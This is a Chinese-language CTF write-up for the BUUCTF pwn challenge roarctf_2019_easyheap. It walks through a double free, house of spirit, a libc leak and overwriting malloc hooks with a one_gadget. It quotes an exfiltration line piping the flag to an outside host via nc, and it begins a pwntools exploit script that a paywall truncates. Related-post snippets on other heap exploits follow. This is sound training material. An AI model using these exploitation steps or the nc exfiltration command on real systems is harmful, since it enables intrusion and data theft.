BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)

最新推荐文章于 2022-04-20 22:46:24 发布
最新推荐文章于 2022-04-20 22:46:24 发布
阅读量790 收藏
点赞数
分类专栏: BUU-PWN CTF知识学习 文章标签: malloc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/105702229
版权
本文详细介绍了如何利用BUUCTF中的一道PWN题目的double free漏洞和stdout重定向进行攻击。通过分析题目,发现添加和删除功能的逻辑问题,以及后门函数的次数限制错误,利用这些漏洞构造特殊的chunk并进行double free。通过house of spirit技巧,修改内存以泄露libc地址,并在stdout关闭后继续通信,最终实现利用和payload执行。
摘要由CSDN通过智能技术生成

这里写目录标题

题目分析

在这里插入图片描述
有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk
在这里插入图片描述
删除之后没有置空,可以多次free
在这里插入图片描述
show功能有条件限制,而且会把stdout关了
在这里插入图片描述
在这里插入图片描述
添加和后门的次数
在这里插入图片描述
后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再进行一次减,这样就不为0了,calloc大小不能控制,为0xa0,在unsorted bin范围内
在这里插入图片描述

漏洞利用

  1. 在输入名字信息时伪造一个chunk,size为0x71
  2. 先利用后门函数进行申请,然后又普通申请一个0x60大小,并释放后门中申请的chunk使得它进入unsorted bin,之后我们在普通申请,就会切割unsorted bin给我们,再次申请获得一个新的chunk,此时就能double free了(因为后门函数仍然指向之前的unsorted bin,但那部分此时被切割给我们了)
  3. 利用house of spirit申请出fake_chunk,并修改0x602090为指定值,并修改正常指针为read_got,利用show功能泄露libc
  4. 在关闭stdout之后,我们仍然可以和程序通信,再次故伎重演,这次利用house of spirit修改__malloc_hook为realloc+0x14,并把__realloc_hook改为one_gadget即可
  5. 最后还有一步,我们需要把stdout重定向到stdin,不然是什么都看不到的,使用exec 1>&0,不过也看到反弹shell的方法(cat flag | nc 192.168.235.128 1234),因为buu反弹shell比较麻烦,所以建议使用重定向

Exp

from pwn import *

r = remote("node3.buuoj.cn", 27712)
#r = process("./roarctf_2019_easyheap")

context.log_level = 'debug'
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''
	b *0x400A47
	x/10gx 0x602088
	c
	''')
elf = ELF("./roarctf_2019_easyheap")
libc = ELF('./libc/libc-2.23.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]
fake_chunk = 0x602060
read_got = elf.got['read']


menu = ">> "
def add(size, content, blind
最低0.47元/天 解锁文章
L.o.W
关注
专栏目录
pwnroarctf_2019_easy_pwn
Nothing
12-24 2108
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
roarctf_2019_easyheap
z1r0的博客
04-10 457
roarctf_2019_easyheap 查看保护 有一个大uaf,show的条件是bss上的一个数据应该 为0xdead… 在666中可以进行删除和创建,这里有一个bug,602010这个数据变成0之后–就是成负数可以无限次使用了 攻击思路:因为有uaf和666这个功能,所以我们构造fastbin attack 形成double free,其实fastbin attack使用的是fastbin_dup_consolidate这个手法。构造出double free之后将堆申请到name_addr这里
roarctf_2019_easyheap(文件描述符1关闭后仍然可以交互)
seaaseesa的博客
04-17 616
roarctf_2019_easyheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 最开始的时候,我们可以在bss段输入一些数据,这意味着,我们可以在bss段伪造一个chunk show功能必须要满足条件才能使用 Free后没有清空指针,因此存在double free。 666功能也可以创建和free堆,但是有次数限制,但是这个次数限制也存在漏洞,即q...
buuctf_roarctf_2019_easyheap离谱的一题
qq_43766802的博客
09-29 655
首先例行公事,用checksec检查一下函数的保护措施,发现除了pie保护全开,但此题不需要泄漏程序加载地址,是个好事 查看一下函数逻辑,程序一开始我们可以向内存区域的某一块输入数据,接下来就是heap的经典菜单栏,add函数允许我们创建任意大小的buf,但只有一个指针,free时没有删除指针,可以double free,当我们输入666时程序允许我们添加和free一个大小固定的chunk给ptr,这个ptr其实没什么用,主要用来给自定义大小的buf double free做道具用,show函数只有当
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 290
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 1989
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 992
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1543
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4084
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
heapdouble free
weixin_44113469的博客
04-14 537
susctf tache_pwn 利用double free 控制全局变量,泄露puts函数地址,查出libc库,利用malloc_hook写入one_gadget执行。 为了加深理解,画了一个图 malloc_hook 钩子利用同理。 exp from pwn import* p = remote("211.65.197.117",10007) a = ELF("./libc6_2.2...
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2345
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
sctf_2019_easy_heap
fayinq的博客
04-20 283
sctf_2019_easy_heap 保护全开,所以又只能修改__malloc_hook,或者说__free_hook了。 函数分析: main函数 add函数 Free函数 Edit函数 下面的函数中有一个off-by-one的漏洞,所以我们可以很自然的想到overlap 思路 首先,程序在运行的时候泄露了一段Mmap的地址,至于给了一个地址,那一定是有用的东西,这里可以思考,是不是可以直接往里面写一段shellcode,然后把__free_hook或者说__malloc_hook改成前面的
BUUCTF:sctf_2019_easy_heap
weixin_51055545的博客
01-04 1367
例行检查一下程序: 64位的一道堆题,放到IDA中看下: 首先看到一个菜单:
Buuoj sctf_2019_easy_heap
u014377094的博客
03-12 656
大佬博客传送门:sctf_2019_easy_heap - LynneHuan - 博客园 (cnblogs.com) 知识更新: 1.你需要了解一下off-by-one,unlink,overlapping是啥 传送门在这里:堆中的 Off-By-One - CTF Wiki (ctf-wiki.org) 2.了解一下chunk 空间的共用情况,也就是下一个的 chunk 的 prev_size 域给当前 chunk 当做数据域使用,这 种情况只出现在 malloc 的大小为 8 的奇数倍(32
sctf_2019_easy_heap(off by null,unlink造成doublefree
m0_51251108的博客
11-18 462
sctf_2019_easy_heap: 保护全开 程序分析: 给我们mmap了一段可读可写可执行的区域,还告诉了我们地址 add里告诉了我们堆地址 其他都挺常规的,delete也释放干净了 漏洞分析: 有个off by null 利用思路: 1.利用漏洞off-by-null造成unlink合并,再申请回来,指针数组里就有两个指针指向同一块地方,我们delete两次就造成了doublefree 2.我们用doublefree往mmap的地方写shellcode 3.再用off-by-null造成unl
BUUCTFroarctf_2019_easy_pwn】(off by one)
weixin_51055545的博客
02-03 1130
BUUCTFroarctf_2019_easy_pwn】 检查程序: 保护机制全开 分析: add(),show(),free()函数都正常,漏洞点在edit()中 a2-a1=10时,我们可以多写入一个字节,存在by one溢出 思路: 1.堆风水泄露libc地址 2.堆块重叠劫持malloc_hook为one_gadget 3.申请触发one_gadget exp: leak地址: add(0x90) add(0x18) add(0x90) add(0x90) free(0) edit(1,0
sctf_2019_easy_heap off-by-null劫持IO_FILE,理解 0ctf2015 free_note unsortedbin-double_free使用
weixin_46521144的博客
08-14 347
分析以及漏洞点 本身off-by-null没什么可以再说的,但是这道题没有show函数,就必须想到要劫持IO_FILE。但是之前就一直有个问题就是既然unsortedbin中地址无法取出,怎么能写到tcache或者fastbin中?之前许多题目因为正好有类似的漏洞,但感觉不是很普世。这次只有一个off-by-null就实现了这一点,因此看完之后恍然大悟。明白了一般性的劫持IO_FILE泄露libc的方法。 关键点:构造chunk overlapping,之后用一个大的unsortedbin包裹住这个chun
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值